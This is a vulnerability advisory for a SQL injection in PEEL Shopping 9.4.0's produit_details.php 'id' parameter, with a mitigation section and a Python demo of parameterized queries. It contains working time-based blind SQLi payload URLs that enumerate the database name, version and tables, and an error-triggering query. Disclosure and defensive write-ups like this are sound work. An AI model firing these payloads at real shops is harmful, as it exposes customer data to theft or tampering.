Vulnerability Name: SQL Injection in "produit_details.php?id" parameter

Date of Discovery: 10 July 2021

Product version: PEEL Shopping 9.4.0. Download link

Author: faisalfs10x

Vulnerability Description: An unauthenticated public user/guest can inject a malicious SQL query, altering the execution of the application's predefined SQL statements, via the "id" parameter of the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. On successful exploitation an attacker can read sensitive data from the database or modify its contents.

Vulnerable URL: http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]

Proof of Concept:

1) Assuming an out-of-the-box installation of peel-shopping_9_4_0, the database name is "peel". This query checks whether DATABASE() LIKE '%peel%' (the pattern is passed as the hex literal 0x257065656c25 so that no quotes are needed). If the condition is TRUE the IF() returns 0 and SLEEP(7) runs, so the response is delayed by 7 seconds before the redirect to the homepage (http://localhost/peel-shopping_9_4_0/). Note that with this payload a FALSE condition still evaluates SLEEP(7-5), so the FALSE case shows as a 2-second delay rather than an instant redirect; the two cases are distinguished by the size of the delay.

url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)

[Screenshot: PoC enumerating the database name (enum_dbname)]

2) Assuming the site runs on a MariaDB database server, this query checks whether VERSION() LIKE '%MariaDB%' (hex literal 0x254d61726961444225). A 5-second delay indicates TRUE; when the condition is FALSE the payload evaluates SLEEP(5-5), so the response returns without delay.

url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)

[Screenshot: PoC enumerating the database version, MariaDB (enum_dbversion)]

3) By default the database contains a table named peel_produits. This query checks whether that table exists: a 10-second delay indicates TRUE. As in step 1, a FALSE result does not redirect instantly with this payload; the IF() returns 5 and SLEEP(10-5) runs, so the FALSE case is a 5-second delay and the TRUE case a 10-second one.

url : http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)

[Screenshot: PoC enumerating the table peel_produits (enum_tablename)]

The application redirects to the homepage when the injected query fails, so to see the raw SQL syntax error, send the request from a tool such as Burp Suite (Repeater) and read the response before the redirect is followed.

Error syntax: http://localhost/peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELdECT(SLEEP(3-(IF(USER()+LIKE+0xGEN_ERROR,0,5)))))ERR)

  1. [Screenshot: MariaDB disclosed in the error message (sql_error_mariadb)]

  2. [Screenshot: peel_produits table name disclosed in the error message (sql_errorbased2)]

Dump of the table peel_profil:

[Screenshot: dump_table_peel_profil]

Consequences:

  • Confidentiality: SQL databases generally hold sensitive data, so loss of confidentiality is the most common consequence of a SQL Injection vulnerability.
  • Integrity: Just as it is possible to read sensitive information, e.g. client/customer data, a SQL Injection attack can also be used to modify or delete that information.

Mitigation: Use prepared statements with parameterized queries, so that the value of "id" is bound as data and never parsed as SQL. In addition, cast the parameter to an integer so that only numeric data reaches the query, e.g. intval($_GET['id']); the cast narrows the input but is not a substitute for the prepared statement.
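To show what the mitigation changes, the following is an added example (not code from PEEL Shopping, which is PHP) written in Python over an in-memory SQLite database as a stand-in for the PHP/MySQL pair. `vulnerable_lookup` pastes the "id" parameter into the SQL text as the advisory describes; `safe_lookup` applies the two recommended controls, an integer cast (the intval() step) and a bound parameter (the PDO prepared-statement equivalent). The table and rows are constructed. SQLite has no SLEEP(), so the injected probe here is boolean rather than time-based: the id=1 row comes back only if a table named peel_produits exists, the same inference as PoC step 3.

```python
import sqlite3
from typing import Any


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the PEEL schema: a peel_produits table with two rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE peel_produits (id INTEGER PRIMARY KEY, nom TEXT)")
    con.executemany("INSERT INTO peel_produits VALUES (?, ?)",
                    [(1, "Produit A"), (2, "Produit B")])
    return con


def vulnerable_lookup(con: sqlite3.Connection, raw_id: str) -> list:
    """The pattern the advisory describes: the 'id' parameter becomes part of the SQL text,
    so a tautology or a nested SELECT is executed as SQL."""
    sql = f"SELECT id, nom FROM peel_produits WHERE id={raw_id}"
    return con.execute(sql).fetchall()


def safe_lookup(con: sqlite3.Connection, raw_id: Any) -> list:
    """Hardened form: integer cast plus a parameterized query."""
    try:
        product_id = int(raw_id)       # rejects anything that is not a whole number
    except (TypeError, ValueError):
        return []
    # The value travels as a bound parameter, never as SQL text, so it cannot alter the
    # statement; this is the control to rely on, the cast only narrows the input.
    return con.execute("SELECT id, nom FROM peel_produits WHERE id=?", (product_id,)).fetchall()


# Boolean probe in the spirit of PoC step 3: evaluates to 1 only if the table exists,
# so the id=1 row is returned exactly when a table named peel_produits is present.
TABLE_EXISTS_PROBE = ("(SELECT CASE WHEN (SELECT COUNT(*) FROM sqlite_master "
                      "WHERE name='peel_produits')>0 THEN 1 ELSE 0 END)")


if __name__ == "__main__":
    con = make_db()
    print("vulnerable, tautology:  ", vulnerable_lookup(con, "1 OR 1=1"))
    print("vulnerable, table probe:", vulnerable_lookup(con, TABLE_EXISTS_PROBE))
    print("safe, tautology:        ", safe_lookup(con, "1 OR 1=1"))
    print("safe, normal id:        ", safe_lookup(con, "2"))
```

One difference from PHP is worth knowing: Python's int() raises on "1 OR 1=1", whereas PHP's intval("1 OR 1=1") returns 1, silently discarding the rest. For an integer column that coercion still neutralises the injection, but it is a coercion rather than validation, which is why the prepared statement, not the cast, is the primary defence.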

Mitigation reference: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

References: